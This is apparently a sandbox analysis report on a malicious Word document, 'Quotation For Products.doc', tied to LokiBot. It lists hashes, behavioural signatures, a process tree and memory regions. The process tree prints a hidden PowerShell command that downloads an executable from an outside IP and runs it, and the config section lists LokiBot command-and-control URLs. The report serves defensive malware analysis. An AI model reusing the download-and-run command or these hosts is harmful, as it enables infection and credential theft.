Analysis
-
max time kernel
107s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-06-2021 03:40
Static task
static1
Behavioral task
behavioral1
Sample
Quotation For Products.doc
Resource
win7v20210410
General
-
Target
Quotation For Products.doc
-
Size
416KB
-
MD5
3a99afd85fb1e4bda80f0a8bb2476616
-
SHA1
2398d29a7cd49968a3ea037821cf864579f20ce8
-
SHA256
2c44f76d882e07be44cb97ff736b54aa2e531ec45c4ad2fa51438824665f532f
-
SHA512
066b74b5a80ac126e71ec4be063f8a3aefd668bbda0f766821c660f961b71ec011c243da1eb3d5fa737e8d39bdeb81ceb190045e2777c14115f4e5cabc502022
Malware Config
Extracted
http://31.210.20.45/1xBet/dgeApp17.exe
Extracted
lokibot
http://209.141.34.39/cap-01/pin.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2220 472 powershell.exe WINWORD.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
bornskin.exepid process 2112 bornskin.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
bornskin.exedescription pid process target process PID 3692 set thread context of 2112 3692 bornskin.exe bornskin.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 472 WINWORD.EXE 472 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exebornskin.exepid process 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 3692 bornskin.exe 3692 bornskin.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exebornskin.exebornskin.exedescription pid process Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 3692 bornskin.exe Token: SeDebugPrivilege 2112 bornskin.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 472 WINWORD.EXE 472 WINWORD.EXE 472 WINWORD.EXE 472 WINWORD.EXE 472 WINWORD.EXE 472 WINWORD.EXE 472 WINWORD.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
WINWORD.EXEpowershell.exebornskin.exedescription pid process target process PID 472 wrote to memory of 2220 472 WINWORD.EXE powershell.exe PID 472 wrote to memory of 2220 472 WINWORD.EXE powershell.exe PID 2220 wrote to memory of 3692 2220 powershell.exe bornskin.exe PID 2220 wrote to memory of 3692 2220 powershell.exe bornskin.exe PID 2220 wrote to memory of 3692 2220 powershell.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe PID 3692 wrote to memory of 2112 3692 bornskin.exe bornskin.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quotation For Products.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/dgeApp17.exe" -Destination "C:\Users\Public\Documents\bornskin.exe";C:\Users\Public\Documents\bornskin.exe2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\bornskin.exe"C:\Users\Public\Documents\bornskin.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bornskin.exeC:\Users\Admin\AppData\Local\Temp\bornskin.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\bornskin.exeMD5
81f63c8e0fab4d42de5486e88aa5ac74
SHA1f3b3d2fb57e01af4bbcc356a71e8a5abe428491c
SHA2562c4029189010085712385bb7329bf0a10851ddec9c9849e60a94962896fcdfe4
SHA512ef293f7d8b32d3cd2edcbc0620dbf17aadf7f85465e8e864aa15118b9c9255240c9ea2d5215709408a6062c1ead868b71cd8749f12be6f4ddc24c7e1ff20c0bb
-
C:\Users\Admin\AppData\Local\Temp\bornskin.exeMD5
81f63c8e0fab4d42de5486e88aa5ac74
SHA1f3b3d2fb57e01af4bbcc356a71e8a5abe428491c
SHA2562c4029189010085712385bb7329bf0a10851ddec9c9849e60a94962896fcdfe4
SHA512ef293f7d8b32d3cd2edcbc0620dbf17aadf7f85465e8e864aa15118b9c9255240c9ea2d5215709408a6062c1ead868b71cd8749f12be6f4ddc24c7e1ff20c0bb
-
memory/472-115-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmpFilesize
64KB
-
memory/472-116-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmpFilesize
64KB
-
memory/472-117-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmpFilesize
64KB
-
memory/472-119-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmpFilesize
64KB
-
memory/472-118-0x00007FFED5190000-0x00007FFED7CB3000-memory.dmpFilesize
43.1MB
-
memory/472-122-0x00007FFED0020000-0x00007FFED110E000-memory.dmpFilesize
16.9MB
-
memory/472-123-0x00007FFECD690000-0x00007FFECF585000-memory.dmpFilesize
31.0MB
-
memory/472-114-0x00007FFEB3A10000-0x00007FFEB3A20000-memory.dmpFilesize
64KB
-
memory/2112-185-0x00000000004139DE-mapping.dmp
-
memory/2112-188-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/2220-179-0x0000000000000000-mapping.dmp
-
memory/2220-182-0x000002016B116000-0x000002016B118000-memory.dmpFilesize
8KB
-
memory/2220-181-0x000002016B113000-0x000002016B115000-memory.dmpFilesize
8KB
-
memory/2220-180-0x000002016B110000-0x000002016B112000-memory.dmpFilesize
8KB
-
memory/3692-184-0x0000000005680000-0x0000000005681000-memory.dmpFilesize
4KB
-
memory/3692-183-0x0000000000000000-mapping.dmp